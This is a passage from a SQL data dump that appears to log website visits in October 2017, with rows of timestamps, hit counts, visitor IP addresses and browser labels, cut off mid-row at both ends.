,'51.255.65.44','other'),(166521,1508073126,1,1,0,0,'217.69.133.5','other'),(166522,1508073397,2,2,0,0,'91.209.11.236','other'),(166523,1508073585,1,1,0,0,'217.182.132.58','other'),(166524,1508073986,1,1,0,0,'178.154.171.88','other'),(166525,1508074405,1,1,0,0,'185.182.81.74','chrome'),(166526,1508074839,1,1,0,0,'217.182.132.188','other'),(166527,1508075104,2,2,0,0,'91.196.178.129','chrome'),(166528,1508075202,1,1,0,0,'217.182.132.35','other'),(166529,1508075215,1,1,0,0,'51.255.65.58','other'),(166530,1508075289,1,1,0,0,'217.182.132.148','other'),(166531,1508075382,1,1,0,0,'213.192.58.30','other'),(166532,1508075400,3,3,0,0,'91.209.11.236','other'),(166533,1508075492,1,1,0,0,'217.182.132.183','other'),(166534,1508076008,1,1,0,0,'164.132.162.160','other'),(166535,1508076028,1,0,1,0,'66.249.70.27',''),(166536,1508076060,1,1,0,0,'66.102.9.27','chrome'),(166537,1508076167,1,1,0,0,'141.8.132.19','other'),(166538,1508076171,1,1,0,0,'178.154.171.88','other'),(166539,1508076415,1,1,0,0,'217.182.132.77','other'),(166540,1508076876,1,1,0,0,'217.182.132.85','other'),(166541,1508077014,2,2,0,0,'51.255.65.63','other'),(166542,1508077190,3,3,0,0,'141.8.142.74','other'),(166543,1508077202,1,1,0,0,'180.76.15.149','other'),(166544,1508077377,1,0,1,0,'66.249.64.29',''),(166545,1508077396,1,1,0,0,'51.255.65.7','other'),(166546,1508077589,1,1,0,0,'91.209.11.236','other'),(166547,1508077637,1,1,0,0,'164.132.162.160','other'),(166548,1508077895,1,1,0,0,'46.211.117.35','chrome'),(166549,1508077897,1,1,0,0,'51.255.65.34','other'),(166550,1508078154,1,1,0,0,'178.154.171.88','other'),(166551,1508078570,1,1,0,0,'217.182.132.29','other'),(166552,1508078729,1,1,0,0,'51.255.65.61','other'),(166553,1508078758,1,1,0,0,'8.29.198.25','other'),(166554,1508078795,2,2,0,0,'91.209.11.236','other'),(166555,1508079239,1,1,0,0,'51.255.65.8','other'),(166556,1508079347,1,1,0,0,'51.255.71.123','other'),(166557,1508079462,1,1,0,0,'51.255.65.67','other'),(166558,1508079631,1,1,0,0,'87.250.224.46','other'),(166559,1508080036,1,1,0,0,'217.182.132.33','other'),(166560,1508080188,1,0,1,0,'66.249.64.29',''),(166561,1508080277,1,1,0,0,'91.209.11.236','other'),(166562,1508080280,1,1,0,0,'217.182.132.34','other'),(166563,1508080314,1,1,0,0,'51.255.65.89','other'),(166564,1508080795,1,1,0,0,'51.255.71.132','other'),(166565,1508081057,1,1,0,0,'137.74.207.110','other'),(166566,1508081523,1,1,0,0,'141.8.142.74','other'),(166567,1508081535,1,1,0,0,'137.74.207.109','other'),(166568,1508081945,1,1,0,0,'217.69.133.9','other'),(166569,1508081990,1,1,0,0,'51.255.65.8','other'),(166570,1508082105,2,2,0,0,'91.209.11.236','other'),(166571,1508082269,1,1,0,0,'51.255.65.41','other'),(166572,1508082509,1,1,0,0,'91.196.178.36','chrome'),(166573,1508082552,1,1,0,0,'51.255.64.106','other'),(166574,1508082709,1,1,0,0,'199.58.86.209','other'),(166575,1508083001,1,1,0,0,'91.196.178.166','chrome'),(166576,1508083098,1,1,0,0,'176.31.231.10','other'),(166577,1508083132,1,1,0,0,'217.182.132.28','other'),(166578,1508083138,1,1,0,0,'78.111.185.208','chrome'),(166579,1508083236,1,1,0,0,'51.255.65.52','other'),(166580,1508083845,1,0,1,0,'66.249.64.29',''),(166581,1508083917,1,1,0,0,'40.77.167.44','other'),(166582,1508083945,2,2,0,0,'178.154.171.88','other'),(166583,1508084118,2,2,0,0,'91.209.11.236','other'),(166584,1508084432,1,1,0,0,'66.102.9.131','chrome'),(166585,1508084576,1,1,0,0,'217.182.132.73','other'),(166586,1508084856,1,1,0,0,'51.255.65.79','other'),(166587,1508085267,1,1,0,0,'51.255.65.96','other'),(166588,1508085626,1,1,0,0,'82.145.220.251','chrome'),(166589,1508085687,1,1,0,0,'217.182.132.97','other'),(166590,1508085798,1,1,0,0,'51.255.65.88','other'),(166591,1508085810,1,1,0,0,'91.209.11.236','other'),(166592,1508085919,1,1,0,0,'180.76.15.16','other'),(166593,1508086062,1,1,0,0,'217.182.132.36','other'),(166594,1508086188,1,1,0,0,'217.182.132.51','other'),(166595,1508086193,1,1,0,0,'137.74.207.119','other'),(166596,1508086340,2,2,0,0,'141.8.142.74','other'),(166597,1508087297,2,2,0,0,'178.154.171.88','other'),(166598,1508087584,1,1,0,0,'217.182.132.55','other'),(166599,1508087625,1,1,0,0,'51.255.65.74','other'),(166600,1508087728,1,1,0,0,'87.250.224.46','other'),(166601,1508087919,1,1,0,0,'51.255.65.83','other'),(166602,1508088014,1,1,0,0,'137.74.207.102','other'),(166603,1508088118,2,2,0,0,'91.209.11.236','other'),(166604,1508089118,1,1,0,0,'51.255.71.113','other'),(166605,1508089256,2,2,0,0,'91.209.11.236','other'),(166606,1508089293,1,0,1,0,'66.249.64.30',''),(166607,1508089540,1,1,0,0,'178.154.171.88','other'),(166608,1508089608,1,1,0,0,'8.29.198.26','other'),(166609,1508089697,1,1,0,0,'66.249.93.89','chrome'),(166610,1508089769,2,1,1,0,'66.249.64.29',''),(166611,1508090075,1,1,0,0,'31.41.71.133','firefox'),(166612,1508090147,2,2,0,0,'141.8.142.74','other'),(166613,1508090211,1,1,0,0,'51.255.65.5','other'),(166614,1508090822,1,0,1,0,'66.249.70.25',''),(166615,1508090858,1,0,1,0,'66.249.64.28',''),(166616,1508091244,1,1,0,0,'217.182.132.52','other'),(166617,1508091260,2,2,0,0,'141.8.142.74','other'),(166618,1508091386,2,2,0,0,'91.209.11.236','other'),(166619,1508091452,1,1,0,0,'217.182.132.66','other'),(166620,1508091470,1,1,0,0,'217.182.132.30','other'),(166621,1508092173,1,1,0,0,'51.255.71.115','other'),(166622,1508092393,1,1,0,0,'217.182.132.36','other'),(166623,1508093164,1,1,0,0,'217.182.132.22','other'),(166624,1508093298,2,2,0,0,'91.209.11.236','other'),(166625,1508094204,1,1,0,0,'217.182.132.51','other'),(166626,1508094357,1,1,0,0,'217.182.132.85','other'),(166627,1508094453,1,1,0,0,'141.8.142.74','other'),(166628,1508094878,1,1,0,0,'51.255.71.110','other'),(166629,1508094901,1,1,0,0,'217.182.132.186','other'),(166630,1508094936,1,1,0,0,'157.55.39.7','other'),(166631,1508095006,1,1,0,0,'216.244.66.237','other'),(166632,1508095035,2,0,2,0,'66.249.64.29',''),(166633,1508095050,1,1,0,0,'178.154.171.88','other'),(166634,1508095092,1,1,0,0,'217.182.132.82','other'),(166635,1508095111,2,1,1,0,'66.249.70.27',''),(166636,1508095688,6,0,6,0,'66.249.70.25',''),(166637,1508095755,1,0,1,0,'66.249.70.29',''),(166638,1508096057,1,0,1,0,'66.249.70.27',''),(166639,1508096124,1,1,0,0,'217.182.132.83','other'),(166640,1508096174,1,1,0,0,'178.154.171.88','other'),(166641,1508096452,1,1,0,0,'51.255.65.4','other'),(166642,1508097007,1,1,0,0,'217.69.133.3','other'),(166643,1508097239,1,1,0,0,'217.182.132.21','other'),(166644,1508097457,2,2,0,0,'141.8.142.74','other'),(166645,1508097459,1,0,1,0,'66.249.64.28',''),(166646,1508097606,1,1,0,0,'217.182.132.179','other'),(166647,1508097896,1,1,0,0,'217.182.132.82','other'),(166648,1508097919,1,1,0,0,'37.52.19.111','chrome'),(166649,1508097990,1,1,0,0,'87.250.224.46','other'),(166650,1508098058,1,1,0,0,'51.255.65.23','other'),(166651,1508098210,1,1,0,0,'40.77.167.44','other'),(166652,1508098329,1,1,0,0,'217.182.132.146','other'),(166653,1508098501,1,1,0,0,'217.182.132.178','other'),(166654,1508098630,1,1,0,0,'137.74.207.108','other'),(166655,1508098899,1,1,0,0,'217.182.132.97','other'),(166656,1508099075,1,1,0,0,'178.154.171.88','other'),(166657,1508099658,1,1,0,0,'51.255.71.133','other'),(166658,1508099759,1,1,0,0,'51.255.65.15','other'),(166659,1508099956,1,1,0,0,'217.182.132.78','other'),(166660,1508100002,2,2,0,0,'141.8.142.74','other'),(166661,1508100007,1,1,0,0,'217.182.132.191','other'),(166662,1508100032,1,1,0,0,'180.76.15.24','other'),(166663,1508100316,1,1,0,0,'51.255.65.12','other'),(166664,1508100335,1,0,1,0,'66.249.70.27',''),(166665,1508100449,1,1,0,0,'8.29.198.26','other'),(166666,1508100767,1,1,0,0,'178.154.171.88','other'),(166667,1508101075,1,1,0,0,'217.69.133.4','other'),(166668,1508101463,1,1,0,0,'51.255.65.81','other'),(166669,1508101624,1,1,0,0,'66.249.64.30','chrome'),(166670,1508102213,1,1,0,0,'51.255.71.132','other'),(166671,1508102334,1,1,0,0,'51.255.65.54','other'),(166672,1508102588,1,1,0,0,'51.255.71.113','other'),(166673,1508102594,1,1,0,0,'217.69.133.2','other'),(166674,1508102753,1,1,0,0,'178.154.171.88','other'),(166675,1508103295,1,0,1,0,'66.249.64.30',''),(166676,1508104368,4,4,0,0,'141.8.142.74','other'),(166677,1508104578,1,1,0,0,'51.255.65.86','other'),(166678,1508104623,1,1,0,0,'217.74.44.252','chrome'),(166679,1508105165,1,1,0,0,'217.182.132.95','other'),(166680,1508105422,1,0,1,0,'66.249.64.30',''),(166681,1508105563,1,1,0,0,'178.154.171.88','other'),(166682,1508105925,1,1,0,0,'217.182.132.93','other'),(166683,1508106012,1,1,0,0,'217.182.132.180','other'),(166684,1508106338,1,1,0,0,'217.182.132.32','other'),(166685,1508106496,2,2,0,0,'141.8.142.74','other'),(166686,1508106942,1,1,0,0,'51.255.71.130','other'),(166687,1508107110,1,1,0,0,'216.244.66.237','other'),(166688,1508107122,1,1,0,0,'217.182.132.65','other'),(166689,1508107271,1,1,0,0,'141.8.132.19','other'),(166690,1508107273,1,1,0,0,'51.255.71.117','other'),(166691,1508107339,1,1,0,0,'51.255.65.64','other'),(166692,1508107538,1,1,0,0,'141.8.142.74','other'),(166693,1508107736,3,3,0,0,'95.158.189.118','other'),(166694,1508108143,1,1,0,0,'217.182.132.20','other'),(166695,1508108385,1,1,0,0,'178.154.171.55','other'),(166696,1508108437,1,1,0,0,'217.182.132.155','other'),(166697,1508108446,1,1,0,0,'164.132.164.180','other'),(166698,1508108672,1,0,1,0,'66.249.64.29',''),(166699,1508108720,1,1,0,0,'151.80.27.118','other'),(166700,1508108757,1,1,0,0,'51.255.71.117','other'),(166701,1508109138,1,0,1,0,'66.249.64.30',''),(166702,1508109337,1,1,0,0,'141.8.132.19','other'),(166703,1508109377,1,1,0,0,'141.8.142.74','other'),(166704,1508109499,2,0,2,0,'66.249.64.28',''),(166705,1508109985,1,1,0,0,'91.209.11.236','other'),(166706,1508110471,1,1,0,0,'217.182.132.156','other'),(166707,1508110669,1,1,0,0,'51.255.65.55','other'),(166708,1508110731,1,1,0,0,'217.182.132.91','other'),(166709,1508110829,1,0,1,0,'66.249.64.30',''),(166710,1508110895,3,3,0,0,'216.244.66.237','other'),(166711,1508110910,1,1,0,0,'141.8.142.74','other'),(166712,1508110931,1,1,0,0,'217.182.132.146','other'),(166713,1508111188,1,1,0,0,'137.74.207.108','other'),(166714,1508111215,1,1,0,0,'157.55.39.7','other'),(166715,1508111284,1,1,0,0,'8.29.198.27','other'),(166716,1508111556,1,1,0,0,'51.255.71.125','other'),(166717,1508111950,1,1,0,0,'51.255.65.88','other'),(166718,1508112004,2,0,2,0,'66.249.70.27',''),(166719,1508112140,1,1,0,0,'178.154.171.88','other'),(166720,1508112251,1,1,0,0,'217.182.132.7','other'),(166721,1508112565,1,1,0,0,'137.74.203.194','other'),(166722,1508112776,1,1,0,0,'217.182.132.241','other'),(166723,1508113362,1,1,0,0,'51.255.65.6','other'),(166724,1508113561,1,1,0,0,'91.209.11.236','other'),(166725,1508113651,1,1,0,0,'137.74.207.119','other'),(166726,1508113929,1,1,0,0,'178.154.171.88','other'),(166727,1508114114,1,1,0,0,'51.255.65.79','other'),(166728,1508114643,1,1,0,0,'217.182.132.86','other'),(166729,1508114776,1,1,0,0,'66.249.70.25','chrome'),(166730,1508114780,1,1,0,0,'66.249.64.29','chrome'),(166731,1508114810,1,1,0,0,'51.255.65.25','other'),(166732,1508114832,1,1,0,0,'164.132.162.155','other'),(166733,1508114904,1,1,0,0,'217.182.132.176','other'),(166734,1508115010,1,1,0,0,'217.69.133.203','other'),(166735,1508115235,1,1,0,0,'178.154.171.88','other'),(166736,1508115436,1,1,0,0,'51.255.65.53','other'),(166737,1508116196,1,1,0,0,'137.74.207.116','other'),(166738,1508116395,1,1,0,0,'51.255.64.106','other'),(166739,1508116425,1,1,0,0,'217.182.132.32','other'),(166740,1508116437,1,0,1,0,'66.249.64.30',''),(166741,1508116564,1,1,0,0,'217.182.132.240','other'),(166742,1508117084,1,1,0,0,'87.250.224.125','other'),(166743,1508117088,1,1,0,0,'95.108.213.24','other'),(166744,1508117227,1,1,0,0,'46.48.13.161','chrome'),(166745,1508117309,1,0,1,0,'66.249.64.28',''),(166746,1508117385,1,1,0,0,'217.182.132.173','other'),(166747,1508117627,1,1,0,0,'51.255.65.77','other'),(166748,1508118065,1,1,0,0,'51.255.65.58','other'),(166749,1508118167,1,0,1,0,'66.249.70.29',''),(166750,1508118820,1,1,0,0,'51.255.65.54','other'),(166751,1508119031,1,1,0,0,'137.74.207.119','other'),(166752,1508119085,1,1,0,0,'141.8.132.22','other'),(166753,1508119327,1,1,0,0,'157.55.39.45','other'),(166754,1508119426,1,0,1,0,'66.249.64.30',''),(166755,1508119428,1,1,0,0,'217.69.133.2','other'),(166756,1508119785,1,1,0,0,'141.8.142.74','other'),(166757,1508119881,1,1,0,0,'51.255.65.42','other'),(166758,1508120204,1,1,0,0,'217.182.132.17','other'),(166759,1508120694,1,1,0,0,'91.209.11.236','other'),(166760,1508121172,1,0,1,0,'66.249.64.28',''),(166761,1508122012,1,0,1,0,'66.249.70.25',''),(166762,1508122129,1,1,0,0,'8.29.198.26','other'),(166763,1508122160,1,1,0,0,'51.255.71.127','other'),(166764,1508122472,1,1,0,0,'51.255.65.40','other'),(166765,1508122823,1,1,0,0,'51.255.65.58','other'),(166766,1508123052,1,0,1,0,'66.249.64.28',''),(166767,1508123122,1,0,1,0,'66.249.64.30',''),(166768,1508123742,2,2,0,0,'178.154.171.88','other'),(166769,1508124027,1,1,0,0,'51.255.65.27','other'),(166770,1508124245,1,0,1,0,'66.249.64.29',''),(166771,1508124375,1,1,0,0,'137.74.207.114','other'),(166772,1508124599,1,0,1,0,'66.249.70.29',''),(166773,1508124973,1,1,0,0,'51.255.65.52','other'),(166774,1508124996,1,1,0,0,'217.69.133.194','other'),(166775,1508125021,1,1,0,0,'199.30.24.225','other'),(166776,1508125314,1,1,0,0,'137.74.203.194','other'),(166777,1508125438,1,1,0,0,'178.154.171.88','other'),(166778,1508125640,1,1,0,0,'217.182.132.20','other'),(166779,1508125641,1,1,0,0,'141.8.142.74','other'),(166780,1508125707,1,1,0,0,'216.244.66.237','other'),(166781,1508125728,1,1,0,0,'51.255.65.22','other'),(166782,1508125894,1,1,0,0,'217.182.132.146','other'),(166783,1508126042,1,1,0,0,'91.209.11.236','other'),(166784,1508126166,1,1,0,0,'51.255.65.3','other'),(166785,1508126273,1,1,0,0,'217.182.132.154','other'),(166786,1508126403,1,1,0,0,'51.255.65.28','other'),(166787,1508126462,1,0,1,0,'66.249.64.29',''),(166788,1508126566,1,1,0,0,'185.17.157.200','chrome'),(166789,1508126591,1,1,0,0,'46.48.13.161','chrome'),(166790,1508126757,1,1,0,0,'217.182.132.240','other'),(166791,1508126848,1,1,0,0,'51.255.65.76','other'),(166792,1508126937,1,1,0,0,'87.250.224.46','other'),(166793,1508127173,1,1,0,0,'217.182.132.179','other'),(166794,1508127191,1,1,0,0,'141.8.142.74','other'),(166795,1508128074,1,1,0,0,'91.209.11.236','other'),(166796,1508128176,1,0,1,0,'66.249.64.28',''),(166797,1508128186,1,1,0,0,'217.182.132.76','other'),(166798,1508128276,1,1,0,0,'51.255.65.94','other'),(166799,1508128359,1,1,0,0,'164.132.162.157','other'),(166800,1508128454,1,1,0,0,'157.55.39.7','other'),(166801,1508128768,1,1,0,0,'141.8.142.74','other'),(166802,1508128909,1,1,0,0,'217.182.132.83','other'),(166803,1508128934,1,1,0,0,'217.182.132.185','other'),(166804,1508129009,1,1,0,0,'217.182.132.192','other'),(166805,1508129796,1,1,0,0,'91.209.11.236','other'),(166806,1508130361,1,0,1,0,'66.249.70.29',''),(166807,1508130473,1,1,0,0,'217.182.132.24','other'),(166808,1508131081,1,0,1,0,'66.249.64.28',''),(166809,1508131504,1,1,0,0,'164.132.162.160','other'),(166810,1508131505,1,1,0,0,'91.209.11.236','other'),(166811,1508132165,1,1,0,0,'157.55.39.45','other'),(166812,1508132482,1,1,0,0,'66.249.64.28','chrome'),(166813,1508132969,1,1,0,0,'8.29.198.25','other'),(166814,1508133064,1,1,0,0,'51.255.65.46','other'),(166815,1508133386,7,7,0,0,'208.110.93.78','other'),(166816,1508133522,1,1,0,0,'51.255.65.74','other'),(166817,1508134154,1,1,0,0,'217.182.132.191','other'),(166818,1508134173,1,1,0,0,'217.182.132.86','other'),(166819,1508134175,1,1,0,0,'66.249.70.27','chrome'),(166820,1508134181,1,1,0,0,'66.249.64.30','chrome'),(166821,1508134234,1,1,0,0,'37.9.113.186','other'),(166822,1508134250,2,2,0,0,'95.132.18.103','chrome'),(166823,1508134344,1,1,0,0,'87.250.224.46','other'),(166824,1508134357,1,1,0,0,'217.182.132.28','other'),(166825,1508134598,1,0,1,0,'66.249.70.29',''),(166826,1508134810,1,1,0,0,'51.255.65.75','other'),(166827,1508134816,1,1,0,0,'51.255.65.62','other'),(166828,1508135189,1,1,0,0,'91.209.11.236','other'),(166829,1508135531,1,1,0,0,'66.249.70.27','chrome'),(166830,1508135923,1,1,0,0,'51.255.65.70','other'),(166831,1508136037,1,1,0,0,'217.182.132.67','other'),(166832,1508136140,1,0,1,0,'66.249.64.29',''),(166833,1508136200,1,1,0,0,'217.182.132.180','other'),(166834,1508136757,1,1,0,0,'51.255.65.85','other'),(166835,1508136818,1,1,0,0,'51.255.65.31','other'),(166836,1508136965,2,2,0,0,'91.209.11.236','other'),(166837,1508138599,1,1,0,0,'91.209.11.236','other'),(166838,1508138615,1,0,1,0,'66.249.64.30',''),(166839,1508138622,1,1,0,0,'217.182.132.6','other'),(166840,1508138666,1,1,0,0,'217.182.132.178','other'),(166841,1508138945,1,1,0,0,'164.132.162.156','other'),(166842,1508138965,1,1,0,0,'51.255.65.86','other'),(166843,1508139147,1,1,0,0,'51.255.65.4','other'),(166844,1508139410,1,1,0,0,'91.196.178.35','chrome'),(166845,1508139444,1,1,0,0,'217.182.132.59','other'),(166846,1508139485,1,1,0,0,'217.182.132.75','other'),(166847,1508139813,1,1,0,0,'51.255.65.60','other'),(166848,1508140038,1,1,0,0,'137.74.201.100','other'),(166849,1508140318,1,1,0,0,'66.249.64.30','chrome'),(166850,1508140326,1,1,0,0,'66.249.70.25','chrome'),(166851,1508140369,1,1,0,0,'51.255.65.38','other'),(166852,1508140407,2,2,0,0,'91.209.11.236','other'),(166853,1508140582,1,1,0,0,'51.255.65.85','other'),(166854,1508141158,1,0,1,0,'66.249.64.29',''),(166855,1508141372,2,2,0,0,'95.213.141.126','opera'),(166856,1508141671,1,1,0,0,'89.178.92.49','msie'),(166857,1508141877,1,1,0,0,'51.255.65.67','other'),(166858,1508141975,1,0,1,0,'66.249.70.29',''),(166859,1508142461,1,1,0,0,'82.145.220.36','chrome'),(166860,1508142966,1,1,0,0,'164.132.162.187','other'),(166861,1508143179,1,1,0,0,'217.182.132.59','other'),(166862,1508143402,1,1,0,0,'82.145.220.36','chrome'),(166863,1508143472,1,1,0,0,'51.255.71.123','other'),(166864,1508143595,1,1,0,0,'185.17.157.200','chrome'),(166865,1508143597,1,1,0,0,'185.17.157.196','chrome'),(166866,1508143598,1,1,0,0,'185.17.157.197','chrome'),(166867,1508143810,1,1,0,0,'8.29.198.25','other'),(166868,1508144212,2,2,0,0,'91.209.11.236','other'),(166869,1508144259,1,0,1,0,'66.249.64.30',''),(166870,1508144665,1,1,0,0,'130.180.220.10','other'),(166871,1508145010,2,1,1,0,'66.249.70.29',''),(166872,1508145484,1,0,1,0,'66.249.64.28',''),(166873,1508145563,1,1,0,0,'51.255.65.48','other'),(166874,1508145729,1,0,1,0,'66.249.64.29',''),(166875,1508146049,1,1,0,0,'91.209.11.236','other'),(166876,1508146214,1,1,0,0,'37.9.113.74','other'),(166877,1508146354,1,1,0,0,'141.8.132.22','other'),(166878,1508146363,1,1,0,0,'164.132.162.188','other'),(166879,1508146620,1,1,0,0,'217.182.132.37','other'),(166880,1508146751,1,1,0,0,'66.249.64.28','chrome'),(166881,1508147036,1,1,0,0,'51.255.65.20','other'),(166882,1508147265,1,0,1,0,'66.249.70.25',''),(166883,1508147326,1,1,0,0,'217.182.132.186','other'),(166884,1508147435,2,2,0,0,'91.209.11.236','other'),(166885,1508147599,1,1,0,0,'66.249.70.25','chrome'),(166886,1508147766,1,0,1,0,'66.249.64.30',''),(166887,1508147798,1,0,1,0,'66.249.70.27',''),(166888,1508147857,1,1,0,0,'66.249.70.27','chrome'),(166889,1508147917,1,0,1,0,'66.249.70.29',''),(166890,1508148208,1,1,0,0,'51.255.65.73','other'),(166891,1508148398,1,1,0,0,'188.163.76.13','chrome'),(166892,1508148427,1,1,0,0,'51.255.71.121','other'),(166893,1508148507,1,1,0,0,'37.9.113.115','other'),(166894,1508148755,1,1,0,0,'66.249.64.28','chrome'),(166895,1508148798,1,1,0,0,'82.145.220.36','chrome'),(166896,1508148809,1,1,0,0,'178.92.250.67','chrome'),(166897,1508148824,1,0,1,0,'66.249.70.29',''),(166898,1508148936,1,1,0,0,'51.255.71.118','other'),(166899,1508148951,1,1,0,0,'199.58.86.211','other'),(166900,1508149096,3,3,0,0,'91.209.11.236','other'),(166901,1508149202,1,1,0,0,'51.255.65.13','other'),(166902,1508149219,1,1,0,0,'91.196.178.36','chrome'),(166903,1508149317,1,1,0,0,'164.132.162.157','other'),(166904,1508149552,1,1,0,0,'217.182.132.71','other'),(166905,1508149613,1,1,0,0,'66.249.64.30','chrome'),(166906,1508149656,1,1,0,0,'137.74.201.99','other'),(166907,1508149681,1,1,0,0,'51.255.65.56','other'),(166908,1508149937,1,1,0,0,'51.255.71.114','other'),(166909,1508150074,2,0,2,0,'66.249.64.29',''),(166910,1508150160,2,0,2,0,'66.249.70.27',''),(166911,1508150168,1,0,1,0,'66.249.70.25',''),(166912,1508150322,1,1,0,0,'216.244.66.237','other'),(166913,1508150634,1,1,0,0,'51.255.65.68','other'),(166914,1508150649,1,1,0,0,'51.255.65.29','other'),(166915,1508151122,2,2,0,0,'91.209.11.236','other'),(166916,1508151236,1,1,0,0,'51.255.65.45','other'),(166917,1508151853,1,1,0,0,'51.255.65.50','other'),(166918,1508151988,1,1,0,0,'217.182.132.81','other'),(166919,1508152009,1,0,1,0,'66.249.64.29',''),(166920,1508152024,1,1,0,0,'82.145.220.36','chrome'),(166921,1508152112,1,1,0,0,'66.249.64.29','chrome'),(166922,1508152195,1,1,0,0,'91.196.178.67','chrome'),(166923,1508152414,1,1,0,0,'51.255.65.80','other'),(166924,1508152449,1,1,0,0,'66.249.70.29','chrome'),(166925,1508152874,1,1,0,0,'91.196.178.36','chrome'),(166926,1508152891,1,1,0,0,'178.154.171.24','other'),(166927,1508153016,1,1,0,0,'137.74.207.170','other'),(166928,1508153051,1,1,0,0,'91.209.11.236','other'),(166929,1508153352,2,2,0,0,'178.92.250.67','chrome'),(166930,1508153467,2,1,1,0,'66.249.64.29',''),(166931,1508153480,1,1,0,0,'82.145.220.36','chrome'),(166932,1508153597,1,1,0,0,'217.182.132.6','other'),(166933,1508153708,1,1,0,0,'217.182.132.174','other'),(166934,1508153885,1,1,0,0,'173.252.88.91','other'),(166935,1508153888,1,1,0,0,'51.255.65.224','other'),(166936,1508153916,1,1,0,0,'173.252.92.116','other'),(166937,1508153930,2,2,0,0,'173.252.88.93','other'),(166939,1508153944,1,1,0,0,'173.252.84.92','other'),(166940,1508153980,1,1,0,0,'173.252.88.86','other'),(166941,1508154000,1,1,0,0,'173.252.84.112','other'),(166942,1508154175,2,2,0,0,'91.196.178.129','chrome'),(166943,1508154255,1,1,0,0,'178.92.250.67','chrome'),(166944,1508154349,1,1,0,0,'82.145.220.53','chrome'),(166945,1508154543,1,1,0,0,'217.182.132.30','other'),(166946,1508154643,1,1,0,0,'8.29.198.27','other'),(166947,1508154646,1,1,0,0,'173.252.84.115','other'),(166948,1508154654,1,1,0,0,'173.252.123.187','other'),(166949,1508154728,2,2,0,0,'91.209.11.236','other'),(166950,1508155374,1,1,0,0,'217.182.132.19','other'),(166951,1508155516,1,1,0,0,'157.55.39.7','other'),(166952,1508155551,1,1,0,0,'217.182.132.176','other'),(166953,1508155895,1,1,0,0,'217.182.132.4','other'),(166954,1508156257,1,0,1,0,'66.249.70.25',''),(166955,1508156292,1,1,0,0,'217.182.132.148','other'),(166956,1508156434,1,1,0,0,'91.209.11.236','other'),(166957,1508156548,1,1,0,0,'217.182.132.56','other'),(166958,1508157108,1,1,0,0,'82.207.22.12','other'),(166959,1508157201,1,0,1,0,'66.249.70.27',''),(166960,1508157213,1,1,0,0,'51.255.65.47','other'),(166961,1508157325,1,1,0,0,'82.145.221.127','chrome'),(166962,1508157495,1,1,0,0,'66.249.64.30','chrome'),(166963,1508157554,1,1,0,0,'151.80.27.116','other'),(166964,1508157711,1,1,0,0,'217.182.132.5','other'),(166965,1508157732,1,1,0,0,'51.255.71.115','other'),(166966,1508158433,1,1,0,0,'157.55.39.45','other'),(166967,1508158482,1,1,0,0,'91.195.90.177','chrome'),(166968,1508158489,1,1,0,0,'51.255.65.26','other'),(166969,1508158752,1,1,0,0,'82.145.221.62','chrome'),(166970,1508158756,1,1,0,0,'91.196.178.37','chrome'),(166971,1508158986,1,0,1,0,'66.249.64.29',''),(166972,1508159054,1,1,0,0,'217.182.132.5','other'),(166973,1508159080,2,1,1,0,'66.249.64.28',''),(166974,1508159203,1,1,0,0,'217.182.132.77','other'),(166975,1508159446,1,1,0,0,'178.154.171.56','other'),(166976,1508159595,1,1,0,0,'66.249.70.29','chrome'),(166977,1508159751,1,0,1,0,'66.249.70.27',''),(166978,1508160429,1,1,0,0,'66.249.64.28','chrome'),(166979,1508160580,1,1,0,0,'51.255.65.86','other'),(166980,1508160951,1,1,0,0,'178.95.130.227','chrome'),(166981,1508161107,1,0,1,0,'66.249.64.29',''),(166982,1508161266,1,0,1,0,'66.249.70.27',''),(166983,1508161458,2,2,0,0,'66.249.64.28','chrome'),(166984,1508161612,1,1,0,0,'51.255.65.84','other'),(166985,1508161845,1,1,0,0,'82.145.221.110','chrome'),(166986,1508162661,1,1,0,0,'66.249.64.28','chrome'),(166987,1508162708,1,1,0,0,'91.196.178.37','chrome'),(166988,1508162718,1,1,0,0,'66.249.64.29','chrome'),(166989,1508163214,1,1,0,0,'141.8.142.29','other'),(166990,1508163230,1,1,0,0,'217.182.132.76','other'),(166991,1508163379,1,1,0,0,'217.182.132.6','other'),(166992,1508163697,1,1,0,0,'217.182.132.180','other'),(166993,1508163834,1,1,0,0,'51.255.71.116','other'),(166994,1508163935,2,2,0,0,'217.182.132.17','other'),(166995,1508164194,1,1,0,0,'51.255.65.97','other'),(166996,1508164200,1,1,0,0,'51.255.65.40','other'),(166997,1508164233,1,1,0,0,'51.255.65.84','other'),(166998,1508164702,1,1,0,0,'51.255.65.66','other'),(166999,1508164931,1,1,0,0,'217.182.132.16','other'),(167000,1508165243,1,1,0,0,'51.255.71.131','other'),(167001,1508165485,1,1,0,0,'8.29.198.27','other'),(167002,1508165526,1,0,1,0,'66.249.64.30',''),(167003,1508166321,1,1,0,0,'51.255.65.25','other'),(167004,1508166601,1,1,0,0,'137.74.207.120','other'),(167005,1508166689,1,1,0,0,'46.229.168.78','other'),(167006,1508166707,3,3,0,0,'46.229.168.75','other'),(167007,1508166727,2,2,0,0,'46.229.168.66','other'),(167008,1508166772,5,5,0,0,'46.229.168.71','other'),(167009,1508166824,7,7,0,0,'46.229.168.80','other'),(167010,1508166858,6,6,0,0,'46.229.168.74','other'),(167011,1508166886,5,5,0,0,'46.229.168.77','other'),(167012,1508166892,1,1,0,0,'46.229.168.65','other'),(167013,1508166947,3,3,0,0,'46.229.168.67','other'),(167014,1508166983,3,3,0,0,'46.229.168.68','other'),(167015,1508167008,4,4,0,0,'146.52.188.249','other'),(167016,1508167043,5,5,0,0,'46.229.168.79','other'),(167017,1508167078,1,1,0,0,'66.249.64.30','chrome'),(167018,1508167130,3,3,0,0,'46.229.168.69','other'),(167019,1508167138,3,3,0,0,'46.229.168.70','other'),(167020,1508167141,1,1,0,0,'178.92.250.67','chrome'),(167021,1508167211,1,1,0,0,'137.74.207.159','other'),(167022,1508167219,5,5,0,0,'46.229.168.76','other'),(167023,1508167241,1,1,0,0,'216.244.66.237','other'),(167024,1508167279,7,7,0,0,'46.229.168.73','other'),(167025,1508167370,3,3,0,0,'46.229.168.72','other'),(167026,1508167376,1,1,0,0,'66.249.64.28','chrome'),(167027,1508167484,1,1,0,0,'217.182.132.90','other'),(167028,1508167511,2,2,0,0,'66.249.64.29','chrome'),(167029,1508167723,5,5,0,0,'46.229.168.78','other'),(167030,1508167783,4,4,0,0,'46.229.168.74','other'),(167031,1508167802,2,2,0,0,'46.229.168.80','other'),(167032,1508167834,4,4,0,0,'46.229.168.65','other'),(167033,1508167852,7,7,0,0,'46.229.168.75','other'),(167034,1508167874,6,6,0,0,'46.229.168.77','other'),(167035,1508167946,5,5,0,0,'46.229.168.71','other'),(167036,15081